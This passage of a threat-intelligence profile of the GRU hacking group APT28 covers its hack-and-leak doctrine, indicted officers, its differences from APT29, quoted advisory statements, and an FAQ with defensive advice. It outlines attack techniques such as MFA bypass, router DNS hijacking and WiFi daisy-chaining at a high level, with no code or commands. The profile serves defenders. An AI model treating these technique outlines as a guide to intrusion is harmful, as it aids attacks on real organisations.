The same pattern applied to the French election operation (2017), where stolen Macron campaign documents were released hours before the first-round voting silence period began — maximizing impact and minimizing the campaign's ability to respond before election day. The WADA leaks (2016, 2017) followed the same model: medical records of athletes were released not simply to humiliate but to advance a specific Russian narrative about Western anti-doping hypocrisy in the wake of state-sponsored Russian doping revelations.

This doctrine has important defensive implications. Organizations in APT28's target profile should not assess compromise solely by what an attacker accessed. The strategic question is what narrative the stolen material could support if selectively released and how a public disclosure of that material would be managed.

Personnel, Indictments & Physical Attribution

APT28 is among the most thoroughly named and indicted nation-state actor groups in public record. The combination of DOJ indictments, European criminal proceedings, open-source investigative journalism (notably Bellingcat), and seized technical equipment has placed specific individuals on the record to a degree unusual in the field of state-sponsored threat intelligence.

July 2018 Mueller Indictment — 12 Unit 26165 Officers

The grand jury indictment filed July 13, 2018 named Viktor Borisovich Netyksho as the commanding officer of Unit 26165 at the time of the 2016 operations. The indictment identified two operational structures within the unit: an attack/operations group commanded by Major Boris Alekseyevich Antonov, and a malware development and infrastructure support group commanded by Lieutenant Colonel Sergey Aleksandrovich Morgachev — the officer specifically named as having directed "development, customization, and monitoring" of X-Agent, with subordinates reporting to him directly. The full list of the twelve named defendants was: Viktor Borisovich Netyksho, Boris Alekseyevich Antonov, Dmitriy Sergeyevich Badin, Ivan Sergeyevich Yermakov, Aleksey Viktorovich Lukashev, Sergey Aleksandrovich Morgachev, Nikolay Yuryevich Kozachek (Lieutenant Captain, X-Agent developer), Pavel Vyacheslavovich Yershov, Artem Andreyevich Malyshev (Second Lieutenant, monitored X-Agent implants), Aleksandr Vladimirovich Osadchuk (Colonel and commanding officer of Unit 74455, not 26165 — named because Unit 74455 coordinated the DCLeaks/Guccifer 2.0 releases), Aleksey Aleksandrovich Potemkin (Unit 74455, supervised infrastructure), and Anatoliy Sergeyevich Kovalev. Kovalev is notable for also being named in the October 2020 Sandworm indictment, providing direct evidence of personnel overlap between Units 26165 and 74455. All twelve individuals remain in Russia and none have appeared in court.

October 2018 DOJ Indictment — Unit 26165 Close-Access Officers

A separate October 2018 indictment charged seven GRU officers, including Aleksei Sergeyevich Morenets and Evgenii Mikhaylovich Serebriakov — the two Unit 26165 cyber operators intercepted in The Hague in April 2018. The indictment established that these individuals had conducted on-site WiFi hacking operations in Rio de Janeiro (August 2016, targeting WADA/USADA), Lausanne (September 2016, targeting WADA and the Canadian Centre for Ethics in Sport), and had been en route to the Spiez chemical laboratory in Switzerland when intercepted. Ivan Sergeyevich Yermakov was also named in this indictment for providing remote reconnaissance support during the physical OPCW operation.

Germany — Arrest Warrant for Dmitry Badin

German federal prosecutors issued an arrest warrant in May 2020 for Dmitry Sergeevich Badin (born November 15, 1990, Kursk) for his alleged role in the 2015 Bundestag breach. Badin was already on the FBI's wanted list for WADA-related operations. Bellingcat and The Insider confirmed his Unit 26165 affiliation by tracing his registered address in car ownership records to 20 Komsomolsky Prospekt, Moscow — the documented address of Unit 26165's headquarters. A second German arrest warrant was issued in 2022 for Nikolay Kozachek for the 2017 compromise of the NATO Joint Air Power Competence Centre in Kalkar, Germany, where X-Agent was installed with a keylogger.

Unit 26165 Physical Address and Structure

Unit 26165 is headquartered at 20 Komsomolsky Prospekt, Moscow — a fact confirmed through Russian corporate registries, car ownership databases cross-referenced by Bellingcat, and references in public Russian military education materials. The unit was originally created on May 23, 1953 as the Soviet GRU's cryptography and signals intelligence center. The current commander as of public records is Colonel Dmitry Aleksandrovich Mikhailov, who replaced Viktor Netyksho in January 2018 — shortly after the 2016 election operation concluded and indictments were being prepared. The EU sanctioned Unit 26165 as an institution, alongside named officers Dmitry Badin and GRU head Igor Kostyukov, in October 2020.

APT28 vs. APT29 — Key Distinctions

APT28 and APT29 are frequently conflated online because both are Russian state-sponsored groups responsible for high-profile intrusions. They are separate organizations with different sponsors, different operational styles, and different strategic objectives. The distinction matters for defenders because the detection approach, dwell behavior, and threat model differ significantly.

  • Sponsor: APT28 is operated by the GRU (military intelligence). APT29 is operated by the SVR (Foreign Intelligence Service — Russia's external civilian intelligence service, equivalent in role to the CIA). The GRU and SVR are separate agencies with different cultures, priorities, and command structures.
  • Operational philosophy: APT28 is aggressive, loud by nation-state standards, and accepts higher operational security risk in exchange for operational tempo. It is willing to burn zero-days rapidly, conduct physical operations, use hack-and-leak to maximize political impact, and run multiple concurrent campaigns. APT29 is defined by extreme patience and stealth — the SolarWinds supply chain compromise ran for approximately nine months before discovery, reflecting a preference for long-term, low-noise access over rapid exploitation.
  • Typical access methods: APT28 relies heavily on spear-phishing, password spraying, zero-day exploitation, and increasingly physical/proximity attacks. APT29 is known for supply chain compromise, OAuth token theft, and the exploitation of trusted software update mechanisms — the SolarWinds SUNBURST backdoor was delivered as a legitimate signed software update to approximately 18,000 organizations.
  • Post-compromise objectives: APT28 collects intelligence and in some cases releases stolen data publicly for information operations. APT29 collects intelligence and does not typically leak — its objective is durable, undetected access to high-value targets (foreign ministries, intelligence agencies, pharmaceutical companies during COVID-19 vaccine development).
  • Detection profile: APT28 leaves more forensic artifacts due to its operational tempo. APT29 is exceptional at cleaning up after itself and living off the land. Hunting for APT29 typically requires behavioral analytics and identity baseline anomaly detection rather than IOC matching; APT28 is more amenable to IOC-based detection given its larger documented indicator set.
  • Both groups targeted the DNC in 2016 — independently, using separate infrastructure and techniques. CrowdStrike's investigation found both COZY BEAR (APT29) and FANCY BEAR (APT28) simultaneously present in the DNC network, apparently unaware of each other. This is consistent with the GRU and SVR operating as competing agencies rather than coordinating collection against the same target.

Documented Statements on APT28

The following statements are drawn from official government advisories and primary security research. Direct quotations are kept to a maximum of 14 words per source in accordance with fair use practice. Each is provided with full attribution for verification.

  • UK NCSC Director of Operations Paul Chichester (May 2025, NCSC Advisory): Paul Chichester described the campaign as presenting "a serious risk to targeted organizations" — specifically those involved in delivering assistance to Ukraine. He called on executives and network defenders across logistics and technology companies to "recognise the elevated threat" and take immediate protective action.
  • ESET researcher Matthieu Faou (May 2025, Operation RoundPress): Faou observed that webmail servers are attractive targets because vulnerabilities "can be triggered remotely by sending an email message." He noted that many organizations fail to keep webmail infrastructure patched, creating a persistent window of exposure that APT28 exploited across Roundcube, MDaemon, Horde, and Zimbra over multiple years.
  • Trend Micro / Feike Hacquebord (April 2026, Dark Reading): "Pawn Storm doesn't shy away from old techniques when they are still effective." Hacquebord's observation is significant: the DNS hijacking technique at the core of FrostArmada is more than 20 years old. Longevity of effectiveness, not novelty, drives APT28's toolkit decisions.
  • Trellix (February 2026, CVE-2026-21509 campaign analysis): Trellix described the tradecraft as reflecting "a well-resourced, advanced adversary consistent with APT28's profile" — pointing specifically to multi-stage malware, extensive obfuscation, cloud service abuse for C2, and persistent targeting of email infrastructure.
  • Denis Calderone, CTO of Suzu Labs (April 2026, Dark Reading): Calderone offered a frank assessment of defensive reality: once APT28 gains a foothold in an organization without a dedicated security operations function, "a small org is going to have a very hard time catching them." His broader point was that APT28's sophistication primarily manifests post-access — initial entry methods are often the same ones seen from far less capable actors.
  • Lumen Black Lotus Labs (April 2026, FrostArmada analysis): Black Lotus Labs described how the technique "modified DNS settings on compromised routers to hijack local network traffic" — a passive, infrastructure-layer credential interception mechanism that required no endpoint malware and generated almost no victim-side visibility.
  • Volexity (November 2024, Nearest Neighbor Attack report): Volexity described the Nearest Neighbor technique as delivering "all the benefits of being in close physical proximity" while the operator remained thousands of miles away — effectively a remote close-access operation that eliminates the physical risk of being identified or detained.
  • UK Minister for Europe statement on the OPCW operation (October 4, 2018): The UK government confirmed plainly that "GRU officers do not just attempt to compromise our computer systems from their barracks" — establishing on the public record that Unit 26165 deploys technical officers to foreign countries to conduct on-site operations when remote methods fail.

Frequently Asked Questions

What does APT28 stand for?

APT stands for Advanced Persistent Threat — a designation used by the cybersecurity firm Mandiant (then FireEye) to classify state-sponsored or state-directed threat actors who conduct sustained, targeted intrusion campaigns. The number 28 is simply a sequential identifier in Mandiant's classification system. FireEye designated the group APT28 in its October 2014 report "APT28: A Window Into Russia's Cyber Espionage Operations." Different vendors use different names for the same group — CrowdStrike calls it Fancy Bear, Microsoft calls it Forest Blizzard (formerly STRONTIUM), ESET calls it Sednit, and so on — but APT28 and G0007 (the MITRE ATT&CK identifier) are the most widely used cross-vendor references.

Is APT28 the same as Fancy Bear?

Yes. Fancy Bear is CrowdStrike's code name for the same group. CrowdStrike uses an animal-based naming system for Russian threat actors — "Bear" denotes Russian origin. The "Fancy" portion was derived from the "Sofacy" malware family the group was using at the time of initial tracking. Both APT28 and Fancy Bear are used interchangeably across the security industry. Other names for the same group include Sofacy, Sednit, Pawn Storm, Forest Blizzard, STRONTIUM, and IRON TWILIGHT among others. All refer to GRU Unit 26165.

Who actually operates APT28 — what is GRU Unit 26165?

Unit 26165 is the 85th Main Special Service Center (85th GTsSS) of Russia's GRU (Main Intelligence Directorate of the General Staff of the Armed Forces). The GRU is Russia's military foreign intelligence service — separate from the civilian SVR and the domestic FSB. Unit 26165 was originally established May 23, 1953 as a cryptography and SIGINT center. It is headquartered at 20 Komsomolsky Prospekt in Moscow. The unit conducts both remote cyber operations and physical close-access operations using technical officers deployed abroad. The July 2018 Mueller indictment named 12 specific officers from this unit, including the unit's then-commander Viktor Netyksho and malware development chief Sergey Morgachev.

How is APT28 different from Sandworm?

Both are GRU units but with different missions and unit numbers. APT28 is Unit 26165, focused on espionage, intelligence collection, and political interference operations. Sandworm (also called APT44 or Seashell Blizzard) is Unit 74455, the GRU's Main Center for Special Technologies, focused on destructive operations — it was responsible for NotPetya, the Ukrainian power grid attacks, and Olympic Destroyer. The two units have coordinated on specific operations (confirmed by DOJ indictments), but they are not the same group and should not be treated as interchangeable. A source that uses APT28 and Sandworm as synonyms is using imprecise attribution.

Has anyone actually been arrested or convicted for APT28 operations?

No convictions. All named individuals remain in Russia and no extradition is possible. The DOJ indictments are symbolic and strategic — they name specific officers with specific charges, creating a permanent public record, limiting those individuals' international travel, and establishing legal precedent. Germany issued arrest warrants for Dmitry Badin (Bundestag hack) and Nikolay Kozachek (NATO facility compromise) but neither has been apprehended. Four GRU officers were physically detained in the Netherlands in April 2018 during the OPCW close-access operation, but they held diplomatic passports and were expelled rather than prosecuted. The international community's response has been coordinated public attribution, sanctions, and intelligence sharing — not criminal prosecution.

What is the "Nearest Neighbor Attack"?

A technique documented by Volexity in November 2024 (describing a February 2022 incident). APT28 had obtained the WiFi credentials of a Washington D.C. target through password spraying, but MFA prevented use of those credentials over the public internet. Rather than give up, APT28 compromised organizations in adjacent buildings within WiFi range of the target, then used dual-homed systems (machines connected to both wired and wireless networks) to daisy-chain through neighboring organizations until reaching a device that could connect to the target's WiFi access points. From there, they connected via RDP and moved laterally inside the target network — all while operating remotely from Russia. The technique achieves the access benefits of a physical close-access operation without the physical risk of being identified or detained.

Can APT28 bypass multi-factor authentication?

Yes, through multiple documented techniques. SpyPress.MDAEMON (Operation RoundPress) extracts the underlying TOTP secret and creates an application password, maintaining mailbox access even after password and 2FA code changes. FrostArmada bypassed MFA entirely by operating at the DNS layer — intercepting authentication traffic before it reaches the MFA checkpoint. The Nearest Neighbor attack bypassed MFA on a WiFi network because the WiFi authentication system did not require MFA (only the internet-facing services did). Password spraying through Tor combined with token theft is another documented approach. Hardware tokens (passkeys, FIDO2) are significantly more resistant than TOTP-based 2FA because they bind authentication to a specific device and cannot be extracted and replicated remotely.

What is APT28's connection to the 2016 U.S. election?

APT28 compromised the Democratic National Committee (DNC), the Democratic Congressional Campaign Committee (DCCC), and the personal email account of John Podesta (Hillary Clinton's campaign chairman) through spear-phishing in early 2016. Tens of thousands of emails were exfiltrated. The material was released through GRU-operated personas — DCLeaks (a fictitious hacktivist site) and Guccifer 2.0 (a fabricated Romanian hacker) — as well as through WikiLeaks. The Mueller investigation indicted 12 GRU Unit 26165 officers for these operations in July 2018. A separate APT29 (SVR) intrusion into the DNC was also active simultaneously, independently — the two groups were apparently unaware of each other.

What should organizations in APT28's target profile do right now?

The May 2025 21-agency CISA advisory (AA25-141A) issued a specific call to action for logistics and technology companies supporting Ukraine: assume you are a target. More broadly: (1) treat your enterprise WiFi network with the same security controls as internet-facing services — MFA must apply to WiFi access, not just web portals; (2) patch Microsoft Outlook and Exchange on an emergency timeline given CVE-2023-23397 and related zero-days; (3) audit all webmail platforms outside Microsoft/Google for XSS vulnerabilities and unauthorized Sieve rules; (4) review application password lists in Microsoft 365 and MDaemon for unauthorized entries; (5) ensure SOHO routers used by remote workers are running current firmware with default credentials replaced; and (6) treat any single detected APT28 IOC as grounds for a full incident response investigation rather than point-in-time remediation.

Sources & Further Reading

cd ../threat-actors